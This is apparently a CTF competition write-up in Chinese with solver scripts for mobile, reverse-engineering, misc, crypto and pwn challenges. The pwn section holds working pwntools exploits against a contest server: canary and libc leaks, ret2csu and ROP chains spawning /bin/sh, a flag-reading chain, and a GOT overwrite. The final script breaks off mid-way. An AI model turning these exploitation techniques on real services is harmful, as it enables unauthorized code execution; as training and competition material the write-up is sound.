Mobile
AreYouRich
JEB分析可知用户名需要10位,密码是用户名异或一个常数+@001
后续分析发现flag是根据用户名和密码生成的,在另一个类里找到提示,发现RC4加密,提取密文密钥解密。
密文:0x51,0xf3,0x54,0x92,0x48,0x4d,0xa0,0x4d,0x20,0x8d,0xb5,0xda,0x9f,0x45,0xc0,0x31,0x8e,0x53,0x87,0x2b,0xca,0xe4,0xc9,0x6d,0x0e
key:5FQ5AaBGbqLGfYwjaRAuWGdDvyjbX5nH
得到异或key:vvvvipuser_TTTTKRWQGP@001
密文:0f460329013023403a32006564630b7b34083c773e73491110
异或得到flag
y0uh@V3@_107_0f_m0n3y!!
DesignEachStep
直接使用JEB动态调试,每次比对时断下可以找到key
key1:DE5_c0mp
key2:r355_m@y
key3:_c0nfu53
DE5_c0mpr355_m@y_c0nfu53
RE
petition
栈上的异或加密,IDAPython脚本提取即可。
from idaapi import *
from idc import *
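def getflag(func_addr):
    """Print one flag character recovered from the function at *func_addr*.

    Walks the instructions from func_addr + 8 to the end of the function,
    collects the immediate operand of every `xor <reg>, <imm>` (operand 0 a
    register, operand 1 an immediate), xors all of them together and prints
    the low byte as a character without a trailing newline.

    Args:
        func_addr: start address of an IDA function.

    Returns:
        None. Functions with no matching xor instruction print nothing
        instead of raising IndexError on an empty key list.
    """
    end_addr = ida_funcs.get_func(func_addr).end_ea
    addr = func_addr + 8
    key = []
    while addr < end_addr:
        ins = print_insn_mnem(addr)
        # operand type 1 == o_reg, 5 == o_imm: only `xor reg, imm` contributes a key byte
        if ins == 'xor' and get_operand_type(addr, 1) == 5 and get_operand_type(addr, 0) == 1:
            key.append(get_operand_value(addr, 1))
        addr = next_head(addr)
    if not key:
        return  # nothing to fold; the original indexed key[0] and crashed here
    flag = 0
    for k in key:
        flag ^= k
    print(chr(flag & 0xff), end='')
    return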
# Start addresses of the functions that each yield one flag character, in flag order.
sub = [0x119C,0x122A,0x12B8,0x1344,0x13D0,0x145C,0x14E8,0x1574,0x1602,0x168E,0x171C,0x17A6,0x1834,0x18C2,0x194E,0x19DA,0x1A64,0x1AEE,0x1B7A,0x1C06,0x1C94,0x1D20,0x1DAA,0x1E34,0x1EC2,0x1F4E,0x1FDA,0x2064,0x20F0,0x217A,0x2208,0x2292,0x231E,0x23AC,0x243A,0x24C4,0x2552,0x25DE,0x266C,0x26FA,0x2784,0x2810]
for func_addr in sub:
    getflag(func_addr)
Locke
ollvm混淆,使用deflat脚本可以去除大部分混淆,分析可知是一些散列和加密组成的验证,过程为
Blowfish -> ROT13 -> AES -> RC4 -> SHA1 -> Base58 -> sha256 -> md2 -> des -> md5。
都需要爆破,经过实验可知字符集为asdfghjkl。
Blowfish
import blowfish
# Expected Blowfish ciphertext block, as little-endian bytes.
a = int.to_bytes(0xD79FD778F60C9E9F, 8, byteorder='little')
t = "asdfghjkl"  # candidate alphabet for the four unknown key characters
plain = b"MeowMeow"
# Fixed 4-byte tail appended to the guessed characters to form the 8-byte key.
key_tail = int.to_bytes(0x72668754, 4, byteorder='little')
for c1 in t:
    print("yes1")  # progress marker, once per outer iteration
    for c2 in t:
        for c3 in t:
            for c4 in t:
                guess = (c1 + c2 + c3 + c4).encode()
                cipher = blowfish.Cipher(guess + key_tail)
                if cipher.encrypt_block(plain) == a:
                    print(guess)
                    exit(0)
# gagf
ROT13
khgs
AES
from Crypto.Cipher import AES
mode = AES.MODE_ECB
key = b"YouNeedaPassword"  # the 16-byte block encrypted under every candidate key
# Full expected ciphertext block; only its first three bytes are compared below.
l1 = [0x44, 0x32, 0x66, 0xCB, 0xAB, 0xE9, 0x2F, 0x97, 0xED, 0x34, 0x92, 0xA7, 0x3C, 0x94, 0xB0, 0xEE]
t = "asdfghjkl"  # candidate alphabet for the four unknown key characters
# Constant 28-byte tail; with the four guessed characters this is a 32-byte AES key.
key_tail = int.to_bytes(0xF889D441683FBCEFECE468CD, 12, byteorder='little') + bytes([0x29, 0x2E, 0x29, 0x60, 0xF6, 0xDE, 0x84, 0x1A, 0x50, 0xE7, 0x3E, 0xEC, 0x4D, 0x5A, 0x2A, 0x7C])
for c1 in t:
    print("ok")  # progress marker, once per outer iteration
    for c2 in t:
        for c3 in t:
            for c4 in t:
                a = (c1 + c2 + c3 + c4).encode() + key_tail
                m = AES.new(a, mode).encrypt(key)
                if b"\x44\x32\x66" in m:
                    print(a)
                    print(m)
# gdgf
-> RC4
// ConsoleApplication4.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <cstdio>
#include <cstring>
#include <iostream>
using namespace std;
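void rc4_init(unsigned char *s, unsigned char *key, unsigned long Len)
{
    // RC4 key scheduling (KSA): s[256] becomes the identity permutation 0..255
    // and is then shuffled under `key` (Len bytes, reused cyclically).
    // The stretched key is kept unsigned: with a signed `char` array any key byte
    // >= 0x80 makes j negative and s[j] indexes before the array.
    unsigned char k[256] = { 0 };
    int j = 0;
    for (int i = 0; i < 256; i++)
    {
        s[i] = (unsigned char)i;
    }
    // An empty key has nothing to schedule; leave s as the identity rather than
    // dividing by zero in key[i % Len].
    if (Len == 0)
        return;
    for (int i = 0; i < 256; i++)
    {
        k[i] = key[i % Len];
    }
    for (int i = 0; i < 256; i++)
    {
        j = (j + s[i] + k[i]) % 256;   // j accumulates the key; swap s[i] and s[j]
        unsigned char tmp = s[i];
        s[i] = s[j];
        s[j] = tmp;
    }
}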
void rc4_crypt(unsigned char *s, unsigned char *Data, unsigned long Len)
{
    // RC4 PRGA: generate Len keystream bytes from the scheduled state s and xor
    // them into Data in place. s is advanced as a side effect, so the same state
    // processes a stream exactly once; encryption and decryption are the same call.
    int i = 0;
    int j = 0;
    for (unsigned long pos = 0; pos < Len; ++pos)
    {
        i = (i + 1) & 0xFF;
        j = (j + s[i]) & 0xFF;
        unsigned char si = s[i];
        unsigned char sj = s[j];
        s[i] = sj;                       // swap s[i] and s[j]
        s[j] = si;
        Data[pos] ^= s[(si + sj) & 0xFF]; // keystream byte is s[s[i] + s[j]] after the swap
    }
}
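int main()
{
    // Brute-force the 4-character RC4 key over the alphabet `table`: encrypt the
    // known plaintext with each candidate and report keys whose ciphertext starts
    // with the expected three bytes.
    unsigned char s[256] = { 0 };              // RC4 state, rebuilt for every candidate
    char key[256] = { "jkhd" };                // candidate key; bytes 0..3 are overwritten below
    const char table[] = { "asdfghjkl" };      // candidate alphabet
    const int tableLen = (int)(sizeof(table) - 1); // 9 characters; the loop bound of 10 in the
                                               // earlier version also tried the terminating NUL
    const unsigned char want[3] = { 0x3F, 0x9F, 0x30 }; // expected ciphertext prefix
    for (int e1 = 0; e1 < tableLen; e1++)
    {
        printf("ok\n"); // progress marker, once per outer iteration
        for (int e2 = 0; e2 < tableLen; e2++)
        {
            for (int e3 = 0; e3 < tableLen; e3++)
            {
                for (int e4 = 0; e4 < tableLen; e4++)
                {
                    // Fresh plaintext copy each time: rc4_crypt works in place.
                    unsigned char pData[512] = "<<<<Now you need a keycard>>>>";
                    key[0] = table[e1];
                    key[1] = table[e2];
                    key[2] = table[e3];
                    key[3] = table[e4];
                    memset(s, 0, 256);
                    rc4_init(s, (unsigned char*)key, 4);
                    rc4_crypt(s, pData, 30);
                    // Compare all three bytes with `==`; an `=` here would overwrite
                    // pData[0] and make the first byte's check meaningless.
                    if (pData[0] == want[0] && pData[1] == want[1] && pData[2] == want[2])
                    {
                        printf("====%s\n", key); // key[4..] is still zero, so this prints 4 chars
                        for (int i = 0; i < 10; i++)
                        {
                            printf("%x ", pData[i]);
                        }
                    }
                }
            }
        }
    }
    return 0;
}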
//jkhd
SHA1
./hashcat.exe -a 3 -m 100 360da9b53004607fc73322aed93ef2e2534989c9 ?a?a?a?a
#360da9b53004607fc73322aed93ef2e2534989c9:
lkfh
Base58
dslkfg
sha256 0x33
./hashcat.exe -a 3 -m 6000 3080974a55c4a477e90348ed8edb0251 ?a?a?a?a
073ea0c645230edbfccd8c87d3ee5287bcf0313b2ac86c94906b3d42231d6964:
ahgh
md2
from Crypto.Hash import MD2
txt = "3080974a55c4a477e90348ed8edb0251"  # target MD2 digest, lowercase hex
t = 'asdfghjkl'  # candidate alphabet for the four unknown characters
for c1 in t:
    for c2 in t:
        for c3 in t:
            for c4 in t:
                candidate = c1 + c2 + c3 + c4
                digest = MD2.new(candidate.encode("utf8")).hexdigest()
                if digest == txt:
                    print(candidate)
#dsgf
des 最后四字节,直接程序爆破
from subprocess import Popen,PIPE
path = './Locke_recovered'  # the recovered binary itself acts as the oracle, one run per candidate
table = "asdfghjkl"  # candidate alphabet for the four DES-stage characters
# Characters already recovered for the earlier stages, and the fixed md5-stage tail.
prefix = "gagfkhgsgdgfjkhdlkfhdslkfgahghdsgf"
suffix = "dfhs"
for c1 in table:
    for c2 in table:
        print("ok1")  # progress marker
        for c3 in table:
            for c4 in table:
                ans = prefix + c1 + c2 + c3 + c4 + suffix
                # Feed the candidate on stdin and collect everything the binary prints.
                with Popen(path, stdin=PIPE, stdout=PIPE) as p:
                    result = p.communicate(ans.encode())[0]
                if b"flag" in result:
                    print(result)
                    print(ans)
print(ans)
md5 直接cmd5查
dfhs
最后连起来即可
MISC
new_misc
把解压的pdf扔进wbStego4open,无密码解密即可得
flag{verY_g00d_YoU_f0und_th1s}
流量分析
直接正则匹配
import re
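s = r"from%20t\),([0-9]*),1\)\)=([0-9]*)"
pat = re.compile(s)
# Read the capture as bytes and decode leniently: the matches of interest are
# ASCII URL fragments, and undecodable bytes elsewhere in the pcapng are dropped
# (errors="ignore") instead of raising. `with` closes the handle after reading.
with open("timu.pcapng", "rb") as f:
    st = f.read().decode("utf-8", "ignore")
lis = pat.findall(st)
# position -> recovered character. A later match for the same position overwrites
# an earlier one, as with the fixed-size list this replaces, but there is no longer
# a 1000-slot ceiling that would raise IndexError on a larger position.
chars = {}
for pos, code in lis:
    chars[int(pos)] = chr(int(code))
print("".join(chars[pos] for pos in sorted(chars)), end="")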
#flag{w1reshARK_ez_1sntit}~~~~<
flag{w1reshARK_ez_1sntit}
A_MISC
爆破压缩包密码得到qwer
修改图片高度得到
https://pan.baidu.com/s/1cG2QvYy3khpQGLfjfbYevg
提取码cavb
同样的做法
import re
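s = r"from%20t\),([0-9]*),1\)\)=([0-9]*)"
pat = re.compile(s)
# Read the capture as bytes and decode leniently: the matches of interest are
# ASCII URL fragments, and undecodable bytes elsewhere in the pcapng are dropped
# (errors="ignore") instead of raising. `with` closes the handle after reading.
with open("timu.pcapng", "rb") as f:
    st = f.read().decode("utf-8", "ignore")
lis = pat.findall(st)
# position -> recovered character. A later match for the same position overwrites
# an earlier one, as with the fixed-size list this replaces, but there is no longer
# a 1000-slot ceiling that would raise IndexError on a larger position.
chars = {}
for pos, code in lis:
    chars[int(pos)] = chr(int(code))
print("".join(chars[pos] for pos in sorted(chars)), end="")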
flag{cd2c3e2fea463ded9af800d7155be7aq}
MISC2
LSB隐写提取得到
flag{h0w_4bouT_enc0de_4nd_pnG}
直接cyberchef解码
flag{h0w_4bouT_enc0de_4nd_pnG}
MI
Crypto
a_crypto
http://www.3fwork.com/kaifa200/004475MYM012472/
easy_crypto
社会主义核心价值观解密
babyrsa
from gmpy2 import *
from Crypto.Util.number import *
# SageMath script (the `PR.<x>` preparser syntax and `2^454` are not plain Python).
# Recovers p from n given the top bits (p1) and a value related to the low bits (q0),
# filling the unknown middle with Coppersmith's small_roots.
p1 = 1514296530850131082973956029074258536069144071110652176122006763622293335057110441067910479
q0 = 40812438243894343296354573724131194431453023461572200856406939246297219541329623
n = 21815431662065695412834116602474344081782093119269423403335882867255834302242945742413692949886248581138784199165404321893594820375775454774521554409598568793217997859258282700084148322905405227238617443766062207618899209593375881728671746850745598576485323702483634599597393910908142659231071532803602701147251570567032402848145462183405098097523810358199597631612616833723150146418889589492395974359466777040500971885443881359700735149623177757865032984744576285054725506299888069904106805731600019058631951255795316571242969336763938805465676269140733371287244624066632153110685509892188900004952700111937292221969
mod=pow(2,265)
# Low 265 bits of p: n * q^-1 mod 2^265 equals p mod 2^265 when q0 agrees with q on
# those bits (presumably q0 is exactly that residue of q; not verifiable here).
p0=n*invert(q0,mod)%mod
# Known high bits placed at bit 724 plus the recovered low bits.
pbar=(p1<<724)+p0
PR.<x> = PolynomialRing(Zmod(n))
# The unknown part of p sits at bits 270..723 (x * 2^265 * 32, |x| < 2^454). The five
# bits 265..269 are not covered by either piece, so the loop adds mod = 2^265 per
# iteration and tries all 32 possibilities until small_roots finds a root.
for i in range(32):
    f=pbar+x*mod*32
    f=f.monic()
    pp=f.small_roots(X=2^454,beta=0.4)   # root modulo a divisor of n of size >= n^0.4
    if(pp):
        break
    pbar+=mod
p=pbar+pp[0]*32*mod
assert n%p==0
print(p)
q=n//p
phi=(p-1)*(q-1)
e=65537
d=invert(e,phi)
c=19073695285772829730103928222962723784199491145730661021332365516942301513989932980896145664842527253998170902799883262567366661277268801440634319694884564820420852947935710798269700777126717746701065483129644585829522353341718916661536894041337878440111845645200627940640539279744348235772441988748977191513786620459922039153862250137904894008551515928486867493608757307981955335488977402307933930592035163126858060189156114410872337004784951228340994743202032248681976932591575016798640429231399974090325134545852080425047146251781339862753527319093938929691759486362536986249207187765947926921267520150073408188188
m=pow(c,d,n)
print(long_to_bytes(m))
#flag{ef5e1582-8116-4f61-b458-f793dc03f2ff}
Crazy_Rsa_Tech
# -*- coding: cp936 -*-
import gmpy2
import time
def CRT(items):
    """Combine residues with the Chinese Remainder Theorem.

    items is a sequence of (residue, modulus) pairs whose moduli are pairwise
    coprime. Returns (x, N) with N the product of all moduli and x the unique
    value in [0, N) congruent to each residue modulo its modulus.
    Raises Exception if two moduli share a factor. Python 2 code: the
    floor division below matches the original integer `/`.
    """
    N = 1
    for _, modulus in items:
        N *= modulus
    total = 0
    for residue, modulus in items:
        cofactor = N // modulus  # exact, since modulus divides N
        # gcdext returns (g, s, t) with s*modulus + t*cofactor == g; t inverts cofactor mod modulus
        g, _, inv = gmpy2.gcdext(modulus, cofactor)
        if g != 1:
            raise Exception("Input not pairwise co-prime")
        total += residue * inv * cofactor
    return total % N, N
# 读入 e, n, c
# Python 2 script (print statements, str.decode('hex')).
# Nine moduli and nine ciphertexts of the same message under e = 9: combining
# them by CRT gives m**9 over the integers, which an exact integer root undoes.
e = 9
n = [71189786319102608575263218254922479901008514616376166401353025325668690465852130559783959409002115897148828732231478529655075366072137059589917001875303598680931962384468363842379833044123189276199264340224973914079447846845897807085694711541719515881377391200011269924562049643835131619086349617062034608799, 92503831027754984321994282254005318198418454777812045042619263533423066848097985191386666241913483806726751133691867010696758828674382946375162423033994046273252417389169779506788545647848951018539441971140081528915876529645525880324658212147388232683347292192795975558548712504744297104487514691170935149949, 100993952830138414466948640139083231443558390127247779484027818354177479632421980458019929149817002579508423291678953554090956334137167905685261724759487245658147039684536216616744746196651390112540237050493468689520465897258378216693418610879245129435268327315158194612110422630337395790254881602124839071919, 59138293747457431012165762343997972673625934330232909935732464725128776212729547237438509546925172847581735769773563840639187946741161318153031173864953372796950422229629824699580131369991913883136821374596762214064774480548532035315344368010507644630655604478651898097886873485265848973185431559958627423847, 66827868958054485359731420968595906328820823695638132426084478524423658597714990545142120448668257273436546456116147999073797943388584861050133103137697812149742551913704341990467090049650721713913812069904136198912314243175309387952328961054617877059134151915723594900209641163321839502908705301293546584147, 120940513339890268554625391482989102665030083707530690312336379356969219966820079510946652021721814016286307318930536030308296265425674637215009052078834615196224917417698019787514831973471113022781129000531459800329018133248426080717653298100515701379374786486337920294380753805825328119757649844054966712377, 
72186594495190221129349814154999705524005203343018940547856004977368023856950836974465616291478257156860734574686154136925776069045232149725101769594505766718123155028300703627531567850035682448632166309129911061492630709698934310123778699316856399909549674138453085885820110724923723830686564968967391721281, 69105037583161467265649176715175579387938714721653281201847973223975467813529036844308693237404592381480367515044829190066606146105800243199497182114398931410844901178842049915914390117503986044951461783780327749665912369177733246873697481544777183820939967036346862056795919812693669387731294595126647751951, 76194219445824867986050004226602973283400885106636660263597964027139613163638212828932901192009131346530898961165310615466747046710743013409318156266326090650584190382130795884514074647833949281109675170830565650006906028402714868781834693473191228256626654011772428115359653448111208831188721505467497494581]
c = [62580922178008480377006528793506649089253164524883696044759651305970802215270721223149734532870729533611357047595181907404222690394917605617029675103788705320032707977225447998111744887898039756375876685711148857676502670812333076878964148863713993853526715855758799502735753454247721711366497722251078739585, 46186240819076690248235492196228128599822002268014359444368898414937734806009161030424589993541799877081745454934484263188270879142125136786221625234555265815513136730416539407710862948861531339065039071959576035606192732936477944770308784472646015244527805057990939765708793705044236665364664490419874206900, 85756449024868529058704599481168414715291172247059370174556127800630896693021701121075838517372920466708826412897794900729896389468152213884232173410022054605870785910461728567377769960823103334874807744107855490558726013068890632637193410610478514663078901021307258078678427928255699031215654693270240640198, 14388767329946097216670270960679686032536707277732968784379505904021622612991917314721678940833050736745004078559116326396233622519356703639737886289595860359630019239654690312132039876082685046329079266785042428947147658321799501605837784127004536996628492065409017175037161261039765340032473048737319069656, 1143736792108232890306863524988028098730927600066491485326214420279375304665896453544100447027809433141790331191324806205845009336228331138326163746853197990596700523328423791764843694671580875538251166864957646807184041817863314204516355683663859246677105132100377322669627893863885482167305919925159944839, 2978800921927631161807562509445310353414810029862911925227583943849942080514132963605492727604495513988707849133045851539412276254555228149742924149242124724864770049898278052042163392380895275970574317984638058768854065506927848951716677514095183559625442889028813635385408810698294574175092159389388091981, 
16200944263352278316040095503540249310705602580329203494665614035841657418101517016718103326928336623132935178377208651067093136976383774189554806135146237406248538919915426183225265103769259990252162411307338473817114996409705345401251435268136647166395894099897737607312110866874944619080871831772376466376, 31551601425575677138046998360378916515711528548963089502535903329268089950335615563205720969393649713416910860593823506545030969355111753902391336139384464585775439245735448030993755229554555004154084649002801255396359097917380427525820249562148313977941413268787799534165652742114031759562268691233834820996, 25288164985739570635307839193110091356864302148147148153228604718807817833935053919412276187989509493755136905193728864674684139319708358686431424793278248263545370628718355096523088238513079652226028236137381367215156975121794485995030822902933639803569133458328681148758392333073624280222354763268512333515]
print '[+]Detecting m...'
data = zip(c, n)
# NOTE: this rebinds n to the CRT product, shadowing the list above.
x, n = CRT(data)
# Exact e-th root of m**e; .digits() gives the decimal string of the mpz result.
realnum = gmpy2.iroot(gmpy2.mpz(x), e)[0].digits()
print ' [-]m is: ' + '{:x}'.format(int(realnum)).decode('hex')
print '[!]All Done!'
PWN
littleof
from pwn import *
# Python 2 pwntools script: payloads are str and the generator is stepped with
# `.next()`; under Python 3 these would need bytes and next(...).
context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
#r = process("./littleof")
#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
r = remote("182.116.62.85",27056)
libc = ELF("./libc-2.27.so")
# Round 1: send 72 bytes; the program echoes them back followed by the bytes
# that sit after the buffer. The script pads the canary's low byte with 0
# (rjust) and reads a 6-byte stack address after it.
payload = "a" * 8 * 9
r.sendlineafter("Do you know how to do buffer overflow?\n",payload)
r.recvuntil(payload + "\n")
canary = u64(r.recv(7).rjust(8,"\x00"))
stack = u64(r.recv(6).ljust(8,"\x00"))
success("canary : " + hex(canary))
success("stack : " + hex(stack))
# Round 2: keep the canary intact and return into addresses inside the binary
# (0x4007f1, 0x400800, 0x400860, 0x400789); what each one is cannot be told
# from this script alone.
payload = "a" * 8 * 9
payload += p64(canary)
payload += p64(stack)
payload += p64(0x4007f1)
payload += p64(0x400800)
payload += p64(0x400860)
payload += p64(0)
payload += p64(0)
payload += p64(0x400789)
r.sendlineafter("harder!",payload)
# Round 3: a short input makes the echo reveal a libc pointer; the 0xa and the
# _IO_2_1_stdin_ offset come from the debugging session, not from this code.
payload = "a" * 8
r.sendlineafter("Do you know how to do buffer overflow?\n",payload)
r.recvuntil(payload)
libc_base = u64(r.recv(6).ljust(8,"\x00")) - 0xa - libc.sym["_IO_2_1_stdin_"]
success("libc_base : " + hex(libc_base))
# Gadget offsets are specific to ./libc-2.27.so.
p_rdi_r = libc_base + 0x00000000000215bf
p_rsi_r = libc_base + 0x0000000000023eea
p_rdx_r = libc_base + 0x0000000000001b96
sh_addr = libc_base + libc.search('/bin/sh').next()
# NOTE: despite the name this is execve's address, and the chain below passes
# (sh_addr, 0, 0) to it.
system_addr = libc_base + libc.sym["execve"]
payload = "a" * 8 * 9
payload += p64(canary)
payload += "b" * 8
payload += p64(p_rdi_r)
payload += p64(sh_addr)
payload += p64(p_rsi_r)
payload += p64(0)
payload += p64(p_rdx_r)
payload += p64(0)
payload += p64(system_addr)
r.sendlineafter("harder!",payload)
r.interactive()
babyof
from pwn import *
# Same as assigning context.log_level and context.terminal one at a time.
context.update(log_level="debug", terminal=['tmux', 'splitw', '-h'])
def ret2csu(offset,csu_end_addr,csu_front_addr,rdx,rsi,edi,call_target,last_ret,rbx = 0,rbp = 1):
    """Build a __libc_csu_init based ROP payload (Python 2 pwntools, returns str).

    offset bytes of filler and 8 bytes for the saved rbp are followed by the
    register-pop gadget at csu_end_addr, which loads rbx, rbp, r12..r15. The
    gadget at csu_front_addr then moves r13d/r14/r15 into edi/rsi/rdx and calls
    [r12 + rbx*8]; with rbx = 0 and rbp = 1 its loop ends after one call, the
    seven zero qwords are consumed by the gadget's tail, and execution
    continues at last_ret.
    """
    chain = [
        "a" * offset,
        "b" * 0x8,
        p64(csu_end_addr),   # ret into the pop gadget
        p64(rbx),            # rbx
        p64(rbp),            # rbp
        p64(call_target),    # r12: pointer to the function that gets called
        p64(edi),            # r13 -> edi
        p64(rsi),            # r14 -> rsi
        p64(rdx),            # r15 -> rdx
        p64(csu_front_addr),
        p64(0) * 7,          # skipped by the gadget's add/pops
        p64(last_ret),
    ]
    return "".join(chain)
# Python 2 pwntools script (str payloads). Three ret2csu payloads are sent, each
# returning to main_addr so the next overflow can be delivered.
#r = process("./babyof")
#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf = ELF("./babyof")
r = remote("182.116.62.85",21613)
libc = ELF("./libc-2.27.so")
r.recvuntil("Do you know how to do buffer overflow?")
# puts(puts_got)
edi = elf.got["puts"]
rsi = 0
rdx = 0
call_target = elf.got["puts"]
main_addr = 0x40066B
payload = ret2csu(0x40,0x40073A,0x400720,rdx,rsi,edi,call_target,main_addr)
r.sendline(payload)
r.recvuntil("I hope you win\n")
# The printed pointer is puts in libc; subtract its symbol offset for the base.
libc_base = u64(r.recvuntil("\n",drop = True).ljust(8,"\x00")) - libc.sym["puts"]
success("libc_base : " + hex(libc_base))
# read(0,bss_base,0x10)
bss_base = 0x601100
edi = 0
rsi = bss_base
rdx = 0x10
call_target = elf.got["read"]
main_addr = 0x40066B
payload = ret2csu(0x40,0x40073A,0x400720,rdx,rsi,edi,call_target,main_addr)
r.send(payload)
sleep(0.5)  # let the read() above start before its 16 bytes arrive
# The 16 bytes: execve's address at bss_base, "/bin/sh" at bss_base + 8.
execve_addr = libc_base + libc.sym["execve"]
payload = ""
payload += p64(execve_addr)
payload += "/bin/sh\x00"
r.send(payload)
# execve("/bin/sh")
edi = bss_base + 8
rsi = 0
rdx = 0
call_target = bss_base   # [r12] now holds execve_addr
main_addr = 0x40066B
payload = ret2csu(0x40,0x40073A,0x400720,rdx,rsi,edi,call_target,main_addr)
r.send(payload)
r.interactive()
onecho
from pwn import *
# Same as assigning context.log_level and context.terminal one at a time.
context.update(log_level="debug", terminal=['tmux', 'splitw', '-h'])
def dbg(cmd = ""):
    """Attach gdb to the module-level tube r, running *cmd* as the gdb script."""
    gdb.attach(r, gdbscript=cmd)
# Python 3 pwntools script (bytes payloads, f-string). 32-bit target: every
# payload is "./flag\0", filler up to the saved return address (0x10c bytes of
# buffer + 4 bytes of saved ebp), then one call laid out on the stack.
#r = process("./onecho")
#libc = ELF("/usr/lib/i386-linux-gnu/libc-2.31.so")
elf = ELF("./onecho")
r = remote("182.116.62.85",24143)
libc = ELF("./libc.so.6")
main_addr = 0x8049220   # not used below
puts_got = elf.got["puts"]
puts_plt = elf.plt["puts"]
bss_addr = 0x0804C100
# Gadgets at fixed addresses inside the binary (so it is presumably not PIE).
p_ebx_r = 0x08049022
p_edi_ebp_r = 0x08049812
# Step 1: puts(puts_got) prints puts's libc address. 0x804973F is where execution
# resumes after the call; its role cannot be told from this script alone.
payload = b"./flag\x00"
payload += b"a" * (0x10c-7)
payload += b"b" * 4
payload += p32(p_ebx_r)
payload += p32(bss_addr)
payload += p32(puts_plt)
payload += p32(0x804973F)
payload += p32(puts_got)
r.sendlineafter("Input your name:\n",payload)
libc_base = u32(r.recv(4)) - libc.sym["puts"]
success(f"libc_base : {hex(libc_base)}")
open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
write_addr = libc_base + libc.sym["write"]
# dbg("b *0x804966D")
# open("./flag")
# The path argument is bss_addr, so the script expects the name input to have
# been stored there (presumably by the program; not visible here).
payload = b"./flag\x00"
payload += b"a" * (0x10c-7)
payload += b"b" * 4
payload += p32(p_edi_ebp_r)
payload += p32(bss_addr)
payload += p32(1)
payload += p32(open_addr)
payload += p32(0x804973F)
payload += p32(bss_addr)
r.sendlineafter("Input your name:\n",payload)
# read(3,bss+0x200,0x40)
# fd 3 assumes the open() above returned the first free descriptor.
payload = b"./flag\x00"
payload += b"a" * (0x10c-7)
payload += b"b" * 4
payload += p32(p_edi_ebp_r)
payload += p32(bss_addr)
payload += p32(1)
payload += p32(read_addr)
payload += p32(0x804973F)
payload += p32(3)
payload += p32(bss_addr+0x200)
payload += p32(0x40)
r.sendlineafter("Input your name:\n",payload)
# write(1,bss+0x200,0x40)
payload = b"./flag\x00"
payload += b"a" * (0x10c-7)
payload += b"b" * 4
payload += p32(p_edi_ebp_r)
payload += p32(bss_addr)
payload += p32(1)
payload += p32(write_addr)
payload += p32(0x804973F)
payload += p32(1)
payload += p32(bss_addr+0x200)
payload += p32(0x40)
r.sendlineafter("Input your name:\n",payload)
r.interactive()
pwn1
#coding:utf-8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
# debug = 1 runs ./pwn locally (gdb.attach(r) can be added there); 0 uses the remote instance.
debug = 0
r = process('./pwn') if debug == 1 else remote('182.116.62.85',24199)
def add(name, price, descrip_size, description):
    """Menu option 1: create a commodity, answering each prompt in turn.

    price, descrip_size and description are converted with str(); every
    answer is sent with a trailing newline.
    """
    r.sendlineafter('your choice>> ', '1')
    r.sendlineafter('name:', name)
    r.sendlineafter('price:', str(price))
    r.sendlineafter('descrip_size:', str(descrip_size))
    r.sendlineafter('description:', str(description))
def dele(name):
    """Menu option 2: delete the commodity called *name*."""
    r.sendlineafter('your choice>> ', '2')
    r.sendlineafter('name:', name)
def lis():
    """Menu option 3: return the listing text between the header and the menu banner."""
    r.sendlineafter('your choice>> ', '3')
    r.recvuntil('all commodities info list below:\n')
    marker = '\n---------menu---------'
    body = r.recvuntil(marker)
    return body[:-len(marker)]
def changePrice(name, price):
    """Menu option 4: adjust the price of *name* by *price* (sent as str)."""
    r.sendlineafter('your choice>> ', '4')
    r.sendlineafter('name:', name)
    r.sendlineafter('input the value you want to cut or rise in:', str(price))
def changeDes(name, descrip_size, description):
    """Menu option 5: replace the description of *name*.

    descrip_size is sent as str; description is sent as given (no str()),
    so it must already be a str.
    """
    r.sendlineafter('your choice>> ', '5')
    r.sendlineafter('name:', name)
    r.sendlineafter('descrip_size:', str(descrip_size))
    r.sendlineafter('description:', description)
def exit():
    """Menu option 6: quit the program.

    NOTE: shadows the builtin exit(); it is never called in this script.
    """
    r.sendlineafter('your choice>> ', '6')
# Initial layout: four commodities; '2' has its description grown from 0x98 to
# 0x100 once '3' exists, then '4' is created.
add('1', 10, 8, 'a')
add('2', 10, 0x98, 'a')
add('3', 10, 4, 'a')
changeDes('2', 0x100, 'a')
add('4', 10, 4, 'a')
def leak_one(address):
    """Return the single byte at *address* as a 1-char str.

    Rewrites '2''s description so that the record following it describes a
    commodity '4' whose description pointer is *address*, then reads that
    byte back from the listing. A listing tail of just '\\n' means the byte
    was a NUL.
    """
    forged = '4' + '\x00' * 0xf + p32(2) + p32(0x8) + p32(address)
    changeDes('2', 0x98, forged)
    tail = lis().split('des.')[-1]
    return '\x00' if tail == '\n' else tail[0]
def leak(address):
    """Return the 4 bytes at *address* (little-endian str), logging them as a word."""
    content = ''.join(leak_one(address + off) for off in range(4))
    log.info('%#x => %#x'%(address, u32(content)))
    return content
#d = DynELF(leak, elf = ELF('./pwn'))
# Read the 4-byte entry the script treats as malloc's GOT slot.
malloc_addr = u32(leak(0x804b028))
log.info("malloc_addr = " + hex(malloc_addr))
# LibcSearcher (third-party) identifies the libc build from one symbol address.
obj = LibcSearcher("malloc",malloc_addr)
libcbase = malloc_addr - obj.dump("malloc")
system_addr = libcbase + obj.dump("system")
log.info('system \'s address = %#x'%(system_addr))
bin_addr = 0x0804B0B8   # not used below
changeDes('1', 0x8, '/bin/sh\x00')
# Same forged record as in leak_one, but with '4''s description pointer set to
# 0x0804B018 so the following changeDes('4', ...) writes system_addr there.
changeDes('2', 0x98, '4' + '\x00' * 0xf + p32(2) + p32(0x8) + p32(0x0804B018))
changeDes('4', 8, p32(system_addr))
# Deleting '1' (whose description is "/bin/sh") triggers the overwritten call.
dele('1')
r.interactive()
easyecho
from pwn import *
# Python 3 pwntools script, run against a local copy of the binary.
context.log_level = 'debug'
p = process("./easyecho")
p.recvuntil("Name: ")
# A 16-byte name with no terminator: the program echoes it and the 6 bytes
# that follow it, which the script reads as a code pointer.
p.send('a'*0x10)
p.recvuntil('a'*0x10)
leak = u64(p.recvn(6)+b'\x00\x00')
log.info("leak = " + hex(leak))
# In the debugger the binary was loaded at 0x555555400000 and the leaked
# pointer was 0x555555400cf0; the difference converts the leak into the base.
codebase = leak + 0x555555400000 - 0x555555400cf0
